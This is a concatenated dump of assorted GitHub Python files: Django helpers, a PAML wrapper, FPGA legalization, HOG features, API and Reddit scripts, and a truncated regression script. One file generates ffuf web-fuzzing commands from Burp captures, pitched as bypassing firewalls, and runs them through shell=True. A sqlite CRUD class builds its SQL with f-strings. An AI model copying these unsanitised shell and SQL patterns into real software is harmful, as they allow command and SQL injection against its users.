)\n","repo_name":"deflect-ca/baskerville","sub_path":"src/baskerville/features/feature_request_interval_variance.py","file_name":"feature_request_interval_variance.py","file_ext":"py","file_size_in_byte":3009,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"33"} +{"seq_id":"40039582853","text":"__all__ = ('AutocompleteList',)\n\n\nclass AutocompleteList(object):\n limit_choices = 20\n order_by = lambda cls, choice: unicode(choice).lower()\n\n def choices_for_values(self):\n values_choices = []\n\n for choice in self.choices:\n if choice in self.values:\n values_choices.append(choice)\n\n return self.order_choices(values_choices)\n\n def choices_for_request(self):\n assert self.choices, 'autocomplete.choices is not set'\n\n requests_choices = []\n q = self.request.GET.get('q', '').lower().strip()\n\n for choice in self.choices:\n if q in unicode(choice).lower():\n requests_choices.append(choice)\n\n return self.order_choices(requests_choices)[0:self.limit_choices]\n\n def order_choices(self, choices):\n return sorted(choices, key=self.order_by)\n","repo_name":"hzlf/openbroadcast","sub_path":"website/tools/autocomplete_light/autocomplete/list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"33"} +{"seq_id":"40200936946","text":"# Wrapper classes to PAML\nfrom __future__ import absolute_import\n\nimport os\nimport re\n\nfrom phylogenetics.utils import run_subprocess\nfrom dendropy import Tree\n\nclass ControlFile(object):\n\n def __init__(self, **kwargs):\n \"\"\" Base class for writing a PAML control file\"\"\"\n # Set the key word arguments as attributes of subclass\n for kw in kwargs:\n setattr(self, kw, kwargs[kw])\n\n self.input = kwargs\n\n @property\n def string(self):\n \"\"\"\n Write control file as single string.\n \"\"\"\n output_string = \"\"\n for kw in self.input:\n output_string += kw + \" = \" + 
str(self.input[kw]) + \"\\n\"\n\n return output_string\n\n def read(self, fname):\n \"\"\" Read from outside control file. \"\"\"\n pass\n\n def write(self, fname):\n \"\"\" Write PAML control file. \"\"\"\n with open(fname, \"w\") as f:\n f.write(self.string)\n\n\nclass BaseML(ControlFile):\n \"\"\"\n Construct a BaseML Control File object\n \"\"\"\n def __init__(self,\n seqfile=\"baseml.nuc\",\n outfile=\"baseml.mlb\",\n treefile=\"tree.nwk\",\n noisy=0,\n verbose=0,\n runmode=0,\n model=0,\n Mgene=0,\n ndata=1,\n clock=0,\n TipDate=\"0 100\",\n fix_kappa=0,\n kappa=0,\n fix_alpha=0,\n alpha=0,\n Malpha=0,\n ncatG=5,\n fix_rho=1,\n rho=0,\n nparK=0,\n nhomo=0,\n getSE=0,\n RateAncestor=0,\n Small_Diff=1e-6,\n cleandata=1,\n icode=0,\n fix_blength=0,\n method=0\n ):\n \"\"\"\"\"\"\n # Inherit base class\n super(BaseML, self).__init__(\n seqfile=seqfile,\n outfile=outfile,\n treefile=treefile,\n noisy=noisy,\n verbose=verbose,\n runmode=runmode,\n model=model,\n Mgene=Mgene,\n ndata=ndata,\n clock=clock,\n TipDate=TipDate,\n fix_kappa=fix_kappa,\n kappa=kappa,\n fix_alpha=fix_alpha,\n alpha=alpha,\n Malpha=Malpha,\n ncatG=ncatG,\n fix_rho=fix_rho,\n rho=rho,\n nparK=nparK,\n nhomo=nhomo,\n getSE=getSE,\n RateAncestor=RateAncestor,\n Small_Diff=Small_Diff,\n cleandata=cleandata,\n icode=icode,\n fix_blength=fix_blength,\n method=method\n )\n\n\n def run(self, ):\n \"\"\" Run BaseML \"\"\"\n pass\n\n\n\n\nclass CodeML(ControlFile):\n \"\"\"\n Construct a CodeML Control File object\n \"\"\"\n def __init__(self,\n seqfile=\"sequences.fasta\",\n outfile=\"codeml_output.txt\",\n treefile=\"tree.nwk\",\n noisy=3,\n verbose=9,\n runmode=0,\n seqtype=2,\n #CodonFreq=0,\n #ndata=1,\n #clock=0,\n #aaDist=0,\n aaRatefile=\"lg.dat\",\n model=3,\n #NSsites=0,\n #icode=0,\n #Mgene=0,\n #fix_kappa=0,\n #kappa=0,\n #fix_omega=0,\n #omega=0.4,\n fix_alpha=0,\n alpha=1,\n #Malpha=0,\n ncatG=4,\n #fix_rho=1,\n #rho=0,\n #getSE=0,\n RateAncestor=2,\n Small_Diff=1e-6,\n cleandata=0,\n 
fix_blength=1,\n method=1\n ):\n \"\"\"\n \"\"\"\n # Construct path to data files from location of installation\n self.aaRatefile_path = os.path.join(os.path.split(__file__)[0], \"dat\")\n\n # Inherit base class\n super(CodeML, self).__init__(\n seqfile=seqfile,\n outfile=outfile,\n treefile=treefile,\n noisy=noisy,\n verbose=verbose,\n runmode=runmode,\n seqtype=seqtype,\n #CodonFreq=CodonFreq,\n #ndata=ndata,\n #clock=clock,\n #aaDist=aaDist,\n aaRatefile= os.path.join(self.aaRatefile_path, aaRatefile),\n model=model,\n #NSsites=NSsites,\n #icode=icode,\n #Mgene=Mgene,\n #fix_kappa=fix_kappa,\n #kappa=kappa,\n #fix_omega=fix_omega,\n #omega=omega,\n fix_alpha=fix_alpha,\n alpha=alpha,\n #Malpha=Malpha,\n ncatG=ncatG,\n #fix_rho=fix_rho,\n #rho=rho,\n #getSE=getSE,\n RateAncestor=RateAncestor,\n Small_Diff=Small_Diff,\n cleandata=cleandata,\n fix_blength=fix_blength,\n method=method\n )\n\n\n\n def run(self, fname=\"codeml-input.txt\"):\n \"\"\" \"\"\"\n # CHECK FOR NECESSARY FILES (PHYLIP and NEWICK)\n if os.path.isfile(self.seqfile) is False:\n raise Exception(\"\"\" seqfile does not exist! \"\"\")\n if os.path.isfile(self.treefile) is False:\n raise Exception(\"\"\" treefile does not exist! 
\"\"\")\n\n # Write out the control file\n self.write(fname)\n\n # Run a subprocess for codeml\n run_subprocess(\"codeml\", fname)\n","repo_name":"cnyuanh/phylogenetics","sub_path":"phylogenetics/exttools/paml.py","file_name":"paml.py","file_ext":"py","file_size_in_byte":5069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"33"} +{"seq_id":"26643947579","text":"from django.core.management import BaseCommand\n\nfrom apps.development.models import Note\nfrom apps.development.models.note import NoteType\n\n\nclass Command(BaseCommand):\n \"\"\"Check empty spends.\"\"\"\n\n def handle(self, *args, **options): # noqa: WPS110\n \"\"\"Handle command.\"\"\"\n notes = Note.objects.filter(\n type=NoteType.TIME_SPEND,\n time_spend__isnull=True,\n )\n if not notes.exists():\n return\n\n self.stdout.write(\"Found {0} items\".format(notes.count()))\n for note in notes.order_by(\"user\"):\n self.stdout.write(\n \"{0} -> {1} [object.pk={2}][note.pk={3}]\".format(\n note.content_type,\n note.content_object,\n note.object_id,\n note.pk,\n ),\n )\n","repo_name":"team-projector/backend","sub_path":"server/apps/development/management/commands/check_empty_spends.py","file_name":"check_empty_spends.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"20661059577","text":"#!/usr/bin/python3\n\nimport os\nimport sys\nimport argparse\nimport subprocess\n\nRED = \"\\033[1;31m\" \nBLUE = \"\\033[1;34m\"\nCYAN = \"\\033[1;36m\"\nGREEN = \"\\033[0;32m\"\nRESET = \"\\033[0;0m\"\nBOLD = \"\\033[;1m\"\n\n\ndef check_if_http(file_content):\n allowed_methods=[\"GET\",\"POST\",\"PUT\"]\n temp_file_content=file_content\n for i in range(len(temp_file_content)):\n temp_file_content[i]=' '.join(temp_file_content[i].split())\n temp_file_content=list(filter(None,file_content))\n request_type=\"\"\n for x in allowed_methods:\n if x in temp_file_content[0]:\n 
request_type=x\n if request_type==\"\":\n sys.stdout.write(BOLD+RED)\n print(\"[-] Request does not seem to be HTTP or Supported request type (Get, Post, Put)\")\n exit()\n else:\n return request_type\n\ndef parse_request(file_content,request_type):\n sys.stdout.write(BOLD+CYAN)\n print(\"[+] Parsing request...\")\n req=dict()\n req[\"request_type\"]=request_type\n if request_type==\"GET\":\n #remove all blank lines and tabs\n for i in range(len(file_content)):\n file_content[i]=' '.join(file_content[i].split())\n file_content=list(filter(None,file_content))\n #headers parsing\n req[\"headers\"]=file_content[1:]\n for header in req[\"headers\"]:\n key,value = header.split(':',1)#split each line by http field name and value\n if(key==\"Host\"):\n req[\"host\"]=value.strip()\n #get request query\n req[\"query\"]=file_content[0].split(\" \")[1].strip()\n return(req)\n else:\n #parsing post request\n while 1:\n if file_content[0]==\"\":\n del file_content[0]\n elif file_content[len(file_content)-1]==\"\":\n del file_content[len(file_content)-1]\n else:\n break\n req[\"request_type\"]=request_type\n #post request query\n req[\"query\"]=file_content[0].split(\" \")[1].strip()\n #headers and body parsing\n for i in range(len(file_content)):\n if file_content[i]==\"\":\n lastheaderat=i\n break\n req[\"headers\"]=file_content[1:lastheaderat]\n req[\"body\"]=file_content[lastheaderat:]\n #host parsing\n for header in req[\"headers\"]:\n key,value = header.split(':')#split each line by http field name and value\n if(key==\"Host\"):\n req[\"host\"]=value.strip()\n break\n return req\n \ndef make_ffuf_command(req):\n sys.stdout.write(BOLD+CYAN)\n print(\"[+] Generating ffuf command\")\n #ffuf -u http://target.com/FUZZ -w wordlist.txt\n str=\"\"\n for header in req['headers']:\n str+=f' -H \\'{header}\\''\n url=f'https://{req[\"host\"]}{req[\"query\"]}'\n if url[len(url)-1]==\"/\":\n url=url[:-1]\n if \"body\" in req :\n body=f\" -d \\'{' '.join(req['body']).strip()}\\'\"\n 
else:\n body=\"\"\n cmd=f\"ffuf -X {req['request_type']}{body} {str} -u {url}/FUZZ -w \"\n process = subprocess.Popen('printf \"hello\\nDhello2\\nhello3\" |'+cmd+'- > /dev/null 2>&1 ', shell=True, stdout=subprocess.PIPE)\n process.wait()\n cmd+=\"wordlist\"\n if process.returncode==0 :\n sys.stdout.write(BOLD+CYAN)\n print(\"[+] ffuf command created successfully\")\n process = subprocess.Popen('echo -n \"'+cmd+'\" | xclip -selection clipboard', shell=True, stdout=subprocess.PIPE)\n process.wait()\n if process.returncode==0:\n sys.stdout.write(BOLD+CYAN)\n print(\"[+] Command copied to clipboard\")\n sys.stdout.write(BOLD+BLUE)\n print(\"[+] Don't forget to change wordlist and FUZZ\")\n\n else:\n process = subprocess.Popen('echo -n \"'+cmd+'\" | xclip -selection clipboard', shell=True, stdout=subprocess.PIPE)\n process.wait()\n if process.returncode==0:\n sys.stdout.write(BOLD+CYAN)\n print(\"[+] Command copied to clipboard\")\n sys.stdout.write(BOLD+RED)\n print(\"[-] errr... code bugged out, this is what i come up with\")\n sys.stdout.write(BOLD+RESET) \n print(cmd)\n exit()\n\n\ndef make_curl_command(req):\n sys.stdout.write(BOLD+RED)\n print(\"[+] To be added soon\")\n exit()\n\nif __name__ == \"__main__\":\n # Parse command line\n parser = argparse.ArgumentParser(description=\"Automatically output ffuf and curl commands that works bypassing firewall for an input request file!! 
\(*¬*)/\")\n parser.add_argument(\"-f\",\"--file\",help=\"Input a captured request file from burp\", \n required=\"True\",action=\"store\")\n parser.add_argument(\"-m\",\"--mode\",help=\"Output command type (ffuf,kr,curl)\",\n default=\"ffuf\", action=\"store\")\n args = parser.parse_args()\n\n if not os.path.exists(args.file):\n sys.stdout.write(BOLD+RED)\n parser.error(\"[-] The file %s does not exist!\" % args.file)\n exit\n else:\n f=open(args.file, 'r')\n file_content=f.read().split('\\n')\n if len(file_content)==1 and file_content[0]==\"\":\n sys.stdout.write(BOLD+RED)\n print(\"[-] File is empty. Please check\")\n exit()\n\n request_type=check_if_http(file_content)\n\n req=parse_request(file_content,request_type)\n\n if args.mode==\"ffuf\":\n make_ffuf_command(req)\n elif args.mode==\"curl\":\n make_curl_command(req)\n else:\n print(\"[-] Nothing matches %s\" % args.mode)","repo_name":"w33knd/copyasffuf","sub_path":"copyasffuf.py","file_name":"copyasffuf.py","file_ext":"py","file_size_in_byte":5477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"39363795674","text":"\"\"\"\nModule: types_config.py\nHolds config for TypesUpdate utilite from app.backend.controller.utils.offline_types.types_update.py\n\"\"\"\n\nimport os\n\nfrom . 
import config\n\n\nclass TypesUpdateConfig(object):\n # Inner settings\n try:\n APP_DIRECTORY = config.Config.APP_DIRECTORY\n except AttributeError:\n APP_DIRECTORY = os.path.abspath(os.path.dirname(__file__))\n\n TARGET = os.path.join(APP_DIRECTORY, '../app/backend/controller/utils/offline_types/types.py')\n TEMPLATE = os.path.join(APP_DIRECTORY, '../app/backend/controller/utils/offline_types/script.py.mako')\n\n # Common settings\n COMMON = {\n # See available names in types.__all__\n 'NAMES': ['UserRoleType', 'UserSubscriptionPlanType', 'LoggerType', 'BookmakerType'],\n 'FREQ_SECONDS': 0,\n 'FREQ_MINUTES': 15,\n 'FREQ_HOURS': 0,\n 'FREQ_DAYS': 0,\n 'ONE_TIME': False,\n 'PRIORITY': False\n }\n\n # Individual settings\n INDIVIDUAL = {\n 'UserRoleType': {\n 'FREQ_SECONDS': 0,\n 'FREQ_MINUTES': 0,\n 'FREQ_HOURS': 0,\n 'FREQ_DAYS': 1,\n 'ONE_TIME': False\n },\n 'UserSubscriptionPlanType': {\n 'FREQ_SECONDS': 0,\n 'FREQ_MINUTES': 0,\n 'FREQ_HOURS': 0,\n 'FREQ_DAYS': 1,\n 'ONE_TIME': False\n },\n 'LoggerType': {\n 'FREQ_SECONDS': 0,\n 'FREQ_MINUTES': 0,\n 'FREQ_HOURS': 0,\n 'FREQ_DAYS': 1,\n 'ONE_TIME': False\n },\n 'BookmakerType': {\n 'FREQ_SECONDS': 0,\n 'FREQ_MINUTES': 0,\n 'FREQ_HOURS': 0,\n 'FREQ_DAYS': 1,\n 'ONE_TIME': False\n }\n }\n\n","repo_name":"alshitov/BetBot-web","sub_path":"config/types_config.py","file_name":"types_config.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"33"} +{"seq_id":"34267555617","text":"from models.alert import Alert\n\n\n# _alert = Alert('8f976b58058d42c3a87273b210f39ff3', 500)\n\n# _alert.saveToDb()\n\nalerts = Alert.all()\n\nfor alert in alerts:\n alert.load_item_price()\n alert.notify_if_price_reached()\n\n# 問題? 
為何不要 price 做在 item 裡面就好\n\nif not alerts:\n print(\"no alerts\")","repo_name":"power80203/flask_temp_project_priceal","sub_path":"alert_updater.py","file_name":"alert_updater.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"37532489321","text":"'''\n@File: dsp_ram_legalization.py\n@Author: Rachel Selina Rajarathnam (DREAMPlaceFPGA) \n@Date: Oct 2020\n'''\nimport math\nimport torch\nfrom torch import nn\nfrom torch.autograd import Function\nimport matplotlib.pyplot as plt\nimport pdb \nimport numpy as np\n\nimport dreamplacefpga.ops.dsp_ram_legalization.legalize_cpp as legalize_cpp\nimport dreamplacefpga.configure as configure\n\nimport logging\nlogger = logging.getLogger(__name__)\n\nclass LegalizeDSPRAMFunction(Function):\n @staticmethod\n def legalize(pos, placedb, region_id, model):\n \"\"\"\n @brief legalize DSP/RAM at the end of Global Placement\n @param locX Instance locX ndarray\n @param locY Instance locY ndarray\n @param num_nodes Instance count\n @param num_sites Instance site count\n @param sites Instance site ndarray \n @param precondWL Instance wirelength preconditioner ndarray \n @param dInit lg_max_dist_init\n @param dIncr lg_max_dist_incr\n @param fScale lg_flow_cost_scale\n @param movVal Maximum & Average Instance movement (list)\n @param outLoc Legalized Instance locations list - {x0, x1, ... xn, y0, y1, ... 
yn} \n \"\"\"\n lg_max_dist_init=10.0\n lg_max_dist_incr=10.0\n lg_flow_cost_scale=100.0\n numNodes = int(pos.numel()/2)\n num_inst = int(placedb.num_movable_nodes_fence_region[region_id])\n outLoc = np.zeros(2*num_inst, dtype=np.float32).tolist()\n\n if region_id == 2:\n mask = model.data_collections.dsp_mask\n sites = placedb.dspSiteXYs\n elif region_id == 3:\n mask = model.data_collections.ram_mask\n sites = placedb.ramSiteXYs\n\n locX = pos[:placedb.num_physical_nodes][mask].cpu().detach().numpy()\n locY = pos[numNodes:numNodes+placedb.num_physical_nodes][mask].cpu().detach().numpy()\n\n num_sites = len(sites)\n precondWL = model.precondWL[:placedb.num_physical_nodes][mask].cpu().detach().numpy()\n movVal = np.zeros(2, dtype=np.float32).tolist()\n\n legalize_cpp.legalize(locX, locY, num_inst, num_sites, sites.flatten(), precondWL, lg_max_dist_init, lg_max_dist_incr, lg_flow_cost_scale, movVal, outLoc)\n\n outLoc = np.array(outLoc)\n updLoc = torch.from_numpy(outLoc).to(dtype=pos.dtype, device=pos.device)\n pos.data[:placedb.num_physical_nodes].masked_scatter_(mask, updLoc[:num_inst])\n pos.data[numNodes:numNodes+placedb.num_physical_nodes].masked_scatter_(mask, updLoc[num_inst:])\n\n return movVal \n\n","repo_name":"rachelselinar/DREAMPlaceFPGA","sub_path":"dreamplacefpga/ops/dsp_ram_legalization/dsp_ram_legalization.py","file_name":"dsp_ram_legalization.py","file_ext":"py","file_size_in_byte":2537,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"33"} +{"seq_id":"20690926463","text":"import praw\r\n\r\nclass from_subreddit:\r\n def __init__(self,sub_name,l):\r\n self. 
r = praw.Reddit(\r\n\r\n client_id=\"[Your client id]\",\r\n client_secret=\"[Your client secret]\",\r\n user_agent=\"gasjasgavbsdkjavsdjhvads\",\r\n )\r\n self.name = sub_name\r\n self.subreddit = self.r.subreddit(self.name)\r\n self.limit = l\r\n\r\n def get_posts(self): \r\n posts = []\r\n \r\n for post in self.subreddit.hot(limit = self.limit):\r\n \r\n if post.url.endswith('.jpg') or post.url.endswith('.png'):\r\n\r\n posts.append(post)\r\n\r\n return posts\r\n\r\n\r\n def get_url_list(self):\r\n urls = []\r\n for post in self.subreddit.hot(limit=self.limit):\r\n if post.url.endswith('.jpg') or post.url.endswith('.png'):\r\n urls.append(post.url)\r\n return urls\r\n\r\n","repo_name":"ReiettoAyanami/RedditPyVisual","sub_path":"redditinfo.py","file_name":"redditinfo.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"33"} +{"seq_id":"72779841055","text":"# Databricks notebook source\n# load data from API\n\nimport requests\nimport json\n\ndef api_data(url):\n response = requests.get(url)\n json_data = json.loads(response.text)\n return json_data\n\nurl = f\"https://jsonplaceholder.typicode.com/users\"\n\na = api_data(url)\n\n\napi_data = json.dumps(a)\n\n\ndf = spark.createDataFrame(a)\n#display(df)\n\n\n# define schema\ndf.printSchema()\n\n\ndbutils.fs.put(\"dbfs:/Nested_json/api_json1.json\",api_data)\n\n\nfrom pyspark.sql.types import StructField, StructType, StringType, MapType,IntegerType\nmapCol = MapType(StringType(),StringType(),True)\nrootschema = StructType([\n StructField('address', MapType(StringType(),StringType(),True)),\nStructField('company', MapType(StringType(),StringType(),True)),\n StructField('email',StringType(),True),\n StructField('id',IntegerType(),True),\n StructField('phone',StringType(),True),\n StructField('username',StringType(),True),\n StructField('website',StringType(),True)])\n\n\n\ndf1 = 
spark.read.format('json').schema(rootschema).load('dbfs:/Nested_json/api_json1.json')\ndisplay(df1)\n\n\nfrom pyspark.sql.functions import explode,col\ndf2 = df.select(df.address.city,df.address.zipcode,df.address.geo)\ndisplay(df2)\n\n\n","repo_name":"hari328373/rest_api","sub_path":"load_data_from_url/json_url.py","file_name":"json_url.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"6958683688","text":"import numpy as np\nimport cv2 as cv\nimport matplotlib.pyplot as plt\nfrom numba import njit\n\n# Vertical kernel\nkernel = np.array([[-1],\n [0],\n [1]])\n\n# Horizontal kernel\nkernel2 = np.array([[-1, 0, 1]])\nwindow_size = 8\n\n@njit()\ndef cal_histogram(angles, mags):\n SizeX = int((angles[0].shape[0]) / window_size)\n SizeY = int((angles[0].shape[1]) / window_size)\n\n histogram_list = np.zeros((SizeY, SizeX, 9))\n for x in range(0, SizeX):\n for y in range(0, SizeY):\n r = x * window_size\n c = y * window_size\n\n \n # Finds the biggest magnitude from the three channels and uses this as the magnitude together with the connected angle.\n for i in range(0, window_size):\n for j in range(0, window_size):\n working_angle = 0.0\n working_mag = 0.0\n for channel in range(len(angles)):\n # This is for bins spaced over 0◦–180◦, i.e. 
the ‘sign’ of the gradient is ignored.\n if mags[channel][r + i][c + j] > working_mag:\n working_angle = angles[channel][r + i][c + j]\n working_mag = mags[channel][r + i][c + j]\n\n # If the angle is bigger than 180 it is changed into the corespoinding normalized in between 0 an 180.\n if working_angle > 180:\n working_angle -= 180\n\n # This section divides the magnitudes out in the 9 histogram bins.\n bin = int(working_angle / 20.0)\n per_for_next_upper = ((bin + 1) * 20 - working_angle) / 20\n per_for_next_bottom = (working_angle - bin * 20) / 20\n\n if bin == 8:\n histogram_list[y, x][bin] += working_mag * per_for_next_bottom\n histogram_list[y, x][0] += working_mag * per_for_next_upper\n else:\n histogram_list[y, x][bin] += working_mag * per_for_next_bottom\n histogram_list[y, x][bin + 1] += working_mag * per_for_next_upper\n\n return histogram_list\n\n\ndef calculate_Hog_OPENCV(frame, notUsed=None):\n # full list of settings for HoG:\n # winSize = (64,128)\n # blockSize = (16,16)\n # blockStride = (8,8)\n # cellSize = (8,8)\n # nbins = 9\n # derivAperture = 1\n # winSigma = 4.\n # histogramNormType = 0\n # L2HysThreshold = 2.0000000000000001e-01\n # gammaCorrection = 0\n # nlevels = 64\n # signedGradient = False\n # hog = cv.HOGDescriptor(winSize,blockSize,blockStride,cellSize,nbins,derivAperture,winSigma,\n # histogramNormType,L2HysThreshold,gammaCorrection,nlevels,signedGradient)\n \n # but defaults perform better\n hog = cv.HOGDescriptor()\n winStride = (8,8)\n padding = (8,8)\n locations = ((0,0),)\n hist = hog.compute(frame,winStride,padding,locations)\n return hist.ravel(), None\n\n\ndef calculate_Hog(frame, draw_arrows = False):\n channels = cv.split(frame) #splits the image into the threechannels\n\n # Calculate the gradients in x and y direction\n mags = []\n angles = []\n for channel in channels:\n gy = (np.float32(cv.filter2D(channel, -1, kernel)) / 255.0)\n gx = (np.float32(cv.filter2D(channel, -1, kernel2)) / 255.0)\n # Converts them into polar 
coordinates and saves themagnitudes and angles in two lists\n mag, angle = cv.cartToPolar(gx, gy, angleInDegrees=True)\n mags.append(mag)\n angles.append(angle)\n # Converts them into polar coordinates and saves themagnitudes and angles in two lists\n histogram_list = cal_histogram(angles, mags)\n\n # print(histogram_list.shape)\n # fig, axs = plt.subplots(histogram_list.shape[1], histogram_list.shape[0])\n # for i, var_name in enumerate(histogram_list):\n # for j, var_name2 in enumerate(histogram_list[i]):\n # axs[j, i].hist(histogram_list[i, j], bins=9)\n \n # Initializing a list to put the features in\n feature_vector = []\n \n e = 0.0000001\n for x in range(0, histogram_list.shape[0] - 1):\n row_x = []\n for y in range(0, histogram_list.shape[1] - 1):\n new_hist = np.array([]).astype(np.float32)\n for x_new in range(0, 2):\n for y_new in range(0, 2):\n new_hist = np.append(new_hist, np.array(histogram_list[x + x_new, y + y_new])) # make a histogram for just 4 cells\n # L2- normalize then clip then normalize.\n divide_value = np.sqrt(np.linalg.norm(new_hist) ** 2 + e)\n #new_table = [min(x, 0.2) for x in (new_hist / divide_value)]\n #divide_value2 = np.sqrt(np.linalg.norm(new_table) ** 2 + e)\n feature_vector.append(new_hist / divide_value) # append histogram to faturevector\n\n\n \n if (draw_arrows):\n for x in range(0, histogram_list.shape[0]):\n for y in range(0, histogram_list.shape[1]):\n center_x = x * window_size + int(window_size / 2)\n center_y = y * window_size + int(window_size / 2)\n for i, value in enumerate(histogram_list[x, y]):\n end_x = int(center_x + value * np.sin((i * 20) * np.pi / 180) )\n end_y = int(center_y + value * np.cos((i * 20) * np.pi / 180) )\n cv.arrowedLine(frame, (center_x, center_y), (end_x, end_y), (0, 0, 255))\n\n return np.reshape(feature_vector, len(feature_vector)*len(feature_vector[0])), frame\n\n\nif __name__ == \"__main__\":\n cap = cv.VideoCapture(r\"Test.mp4\")\n # Check if the webcam is opened correctly\n if not 
cap.isOpened():\n raise IOError(\"Cannot open webcam\")\n\n # frame = cv.imread(\"newimg3.png\")\n # frame = cv.resize(frame,(64,128))\n while True:\n ret, frame = cap.read()\n histrograms, frame = calculate_Hog(frame, True)\n\n plt.figure()\n plt.imshow(cv.cvtColor(frame, cv.COLOR_BGRA2RGB))\n plt.show()\n \n","repo_name":"Anders-Clement/P7","sub_path":"ProjectHOG/calc_hog.py","file_name":"calc_hog.py","file_ext":"py","file_size_in_byte":6106,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"43288779878","text":"class MyCrud:\n def __init__(self, db):\n import sqlite3\n self.conexao = sqlite3.connect(db)\n self.cur = self.conexao.cursor()\n\n def close_db(self):\n self.conexao.close()\n print('conexão fechada')\n\n def create_table(self, tb_name, coluna1, coluna2):\n self.tb_name = tb_name\n self.coluna1 = coluna1\n self.coluna2 = coluna2\n sql = f\"\"\"\n CREATE TABLE IF NOT EXISTS {self.tb_name} (\n id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,\n {self.coluna1} TEXT NOT NULL,\n {self.coluna2} TEXT\n )\"\"\"\n self.cur.execute(sql)\n self.conexao.commit()\n print('tabela criada')\n\n def select(self):\n sql = \"\"\"\n SELECT * FROM clientes\"\"\"\n self.cur.execute(sql)\n resultado = self.cur.fetchall()\n for i in resultado:\n print(i)\n\n def insert(self, nome, cpf):\n self.nome = nome\n self.cpf = cpf\n sql = f\"\"\"\n INSERT INTO clientes (nome, cpf) VALUES ('{self.nome}', '{self.cpf}')\"\"\"\n self.cur.execute(sql)\n self.conexao.commit()\n print('Dados inseridos')\n\n def update(self, tb_name, coluna1, coluna2, id, dados_coluna1, dados_coluna2):\n self.tb_name = tb_name\n self.coluna1 = coluna1\n self.coluna2 = coluna2\n self.id = id\n self.dados_coluna1 = dados_coluna1\n self.dados_coluna2 = dados_coluna2\n sql = f\"\"\"UPDATE {self.tb_name}\n SET {self.coluna1} = \"{self.dados_coluna1}\", {self.coluna2} = \"{self.dados_coluna2}\"\n WHERE id = {self.id}\"\"\"\n self.cur.execute(sql)\n 
self.conexao.commit()\n print('Dados alterados')\n\n def delete(self, tb_name, id):\n self.tb_name = tb_name\n self.id = id\n sql = f\"\"\"\n DELETE FROM {tb_name}\n WHERE id = '{self.id}'\"\"\"\n self.cur.execute(sql)\n self.conexao.commit()\n print('Dado deletados')","repo_name":"carlosferreira-dev/UGB_SI","sub_path":"2/Programação 1/N2/Aula 10/crud.py","file_name":"crud.py","file_ext":"py","file_size_in_byte":1971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"13223419216","text":"from django.template import Library\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.contrib.auth.models import User\nfrom django.utils.safestring import mark_safe\nfrom hashlib import md5\n\nregister = Library()\n\n@register.filter()\ndef contenttype(value):\n\treturn ContentType.objects.get_for_model(value).pk\n\n@register.filter()\ndef gravatar(value, size = 60):\n\tif isinstance(value, User):\n\t\tvalue = value.email\n\t\n\treturn mark_safe(\n\t\t'http://www.gravatar.com/avatar/%s.jpg?d=identicon&s=%d' % (\n\t\t\tmd5(value.lower()).hexdigest(), int(size)\n\t\t)\n\t)","repo_name":"amarksteadman/bambu-tools","sub_path":"bambu-comments/bambu/comments/templatetags/comments.py","file_name":"comments.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"33"} +{"seq_id":"34628354561","text":"import requests\nimport json\nimport jsonpath\n\nurl =\"https://reqres.in/api/users/2\"\n\nfile = open(\"create_user.json\")\njson_input = file.read()\nrequest_json = json.loads(json_input)\n\nresponse = requests.put(url,request_json)\nprint(response.status_code)\n\nupdatedAt = 
jsonpath.jsonpath(json.loads(response.content),\"updatedAt\")\nprint(updatedAt[0])\n\n\n\n\n","repo_name":"naveens33/rest.api.testing","sub_path":"update_user.py","file_name":"update_user.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"10382112272","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\n# Reading and visualizing data using scatter plot\n\nCSV_Data = pd.read_csv(\"D:/Semester 6/Machine Learning/Assignment 1/CarPrice_Assignment.csv\")\nCSV_Data = CSV_Data.replace(np.NaN,0)\n\n#print(CSV_Data.shape)\n\n#Separating Features For Training\n\nX1 = CSV_Data.iloc[0:155,0:1]\nX2 = CSV_Data.iloc[0:155,1:2]\nX3 = CSV_Data.iloc[0:155,2:3]\nX4 = CSV_Data.iloc[0:155,3:4]\nX5 = CSV_Data.iloc[0:155,4:5]\nX6 = CSV_Data.iloc[0:155,5:6]\nY = CSV_Data.iloc[0:155,-1]\n\n#Label \n\nY = np.array(Y)\nY = Y[:,np.newaxis]\n\n#Scaling_Of_X_Features\n\ndef scaling_of_X_features(X):\n min_of_x = X.min()\n max_of_x = X.max()\n numerator = X-min_of_x\n denominator = max_of_x-min_of_x\n scaling = numerator/denominator\n return scaling\n\nscale_x1 = scaling_of_X_features(X1)\nscale_x2 = scaling_of_X_features(X2)\nscale_x3 = scaling_of_X_features(X3)\nscale_x4 = scaling_of_X_features(X4)\nscale_x5 = scaling_of_X_features(X5)\nscale_x6 = scaling_of_X_features(X6)\n\n#Scaling_Of_Y_Label\n\nmin_y = Y.min()\nmax_y = Y.max()\nscale_y_numerator = Y-min_y\nscale_y_denominator = max_y-min_y\nscale_y = scale_y_numerator/scale_y_denominator\n\n\nm,col = 155,6\nones = 